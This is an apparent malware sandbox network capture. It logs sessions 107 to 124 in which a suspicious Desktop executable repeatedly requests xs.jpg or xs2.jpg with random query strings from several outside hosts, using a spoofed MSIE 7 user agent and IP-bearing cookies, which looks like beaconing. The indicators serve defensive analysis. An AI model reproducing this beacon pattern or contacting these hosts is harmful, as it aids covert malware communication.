                                  Jul 5, 2024 08:02:19.462964058 CEST | 206 | OUT | GET /images/xs2.jpg?494885e8=-1819495128 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:20.199573994 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:20 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  107 | 192.168.2.9 | 49820 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:20.574193954 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:21.437925100 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:21 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:21 GMT
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  108 | 192.168.2.9 | 49821 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:21.587513924 CEST | 310 | OUT | GET /images/xs.jpg?4e1a4979=218554042 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159337|1720159259|3|21|0
                                  Jul 5, 2024 08:02:22.330648899 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:22 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159342|1720159259|4|22|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  109 | 192.168.2.9 | 49822 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:22.352420092 CEST | 302 | OUT | GET /xs.jpg?4fe5ce70=1066875328 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159338|1720159259|3|21|0
                                  Jul 5, 2024 08:02:22.855791092 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:22 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159342|1720159259|3|22|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  110 | 192.168.2.9 | 49823 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:22.866674900 CEST | 305 | OUT | GET /images/xs.jpg?50eb79ae=-222139126 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159338|1720159260|3|21|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:23.372435093 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:23 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159343|1720159260|4|22|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  111 | 192.168.2.9 | 49824 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:23.402045965 CEST | 191 | OUT | GET /xs.jpg?54bd4f7c=-29888908 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:24.085544109 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:23 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  112 | 192.168.2.9 | 49825 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:24.133917093 CEST | 204 | OUT | GET /images/xs2.jpg?5bf62f02=667228684 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:24.841244936 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:24 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:24.847831011 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:25.069262028 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:24 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:24 GMT
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  113 | 192.168.2.9 | 49826 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:25.220412970 CEST | 312 | OUT | GET /images/xs.jpg?5fcee9d4=-1633131316 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159342|1720159259|4|22|0
                                  Jul 5, 2024 08:02:25.959955931 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:25 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159345|1720159259|3|23|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  114 | 192.168.2.9 | 49827 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:25.987014055 CEST | 303 | OUT | GET /xs.jpg?66b9efaa=-1696088408 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159342|1720159259|3|22|0
                                  Jul 5, 2024 08:02:26.497833014 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:26 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159346|1720159259|3|23|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  115 | 192.168.2.9 | 49828 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:26.526856899 CEST | 306 | OUT | GET /images/xs.jpg?6c8a2c8f=-1305955780 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159343|1720159260|4|22|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:27.039295912 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:26 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159346|1720159260|3|23|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  116 | 192.168.2.9 | 49829 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:27.230077982 CEST | 192 | OUT | GET /xs.jpg?6e4b76cf=-594088546 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:27.903812885 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:27 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  117 | 192.168.2.9 | 49830 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:27.958117962 CEST | 205 | OUT | GET /images/xs2.jpg?72a457e7=1026930563 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:28.694031000 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:28 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:28.712152958 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:28.934261084 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:28 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:28 GMT
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  118 | 192.168.2.9 | 49831 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:29.271009922 CEST | 311 | OUT | GET /images/xs.jpg?7a6a3bf3=-187402266 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159345|1720159259|3|23|0
                                  Jul 5, 2024 08:02:30.001461983 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:29 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159349|1720159259|3|24|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  119 | 192.168.2.9 | 49832 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:30.032192945 CEST | 301 | OUT | GET /xs.jpg?7f8f3cd8=-14779984 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159346|1720159259|3|23|0
                                  Jul 5, 2024 08:02:30.518532991 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:30 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159350|1720159259|3|24|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  120 | 192.168.2.9 | 49833 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:30.739815950 CEST | 306 | OUT | GET /images/xs.jpg?8644bbad=-1200973547 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159346|1720159260|3|23|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:31.257882118 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:31 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159351|1720159260|4|24|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  121 | 192.168.2.9 | 49834 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:31.349246025 CEST | 193 | OUT | GET /xs.jpg?8cd08851=-1502504717 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:32.130484104 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:31 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  122 | 192.168.2.9 | 49835 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:32.227758884 CEST | 206 | OUT | GET /images/xs2.jpg?908734c0=-1522004096 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:33.006781101 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:32 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:33.012326002 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:33.237926960 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:33 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:33 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  123 | 192.168.2.9 | 49836 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:33.421324015 CEST | 309 | OUT | GET /images/xs.jpg?9a275efc=46455532 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159349|1720159259|3|24|0
                                  Jul 5, 2024 08:02:34.172972918 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:34 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159354|1720159259|4|25|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  124 | 192.168.2.9 | 49837 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
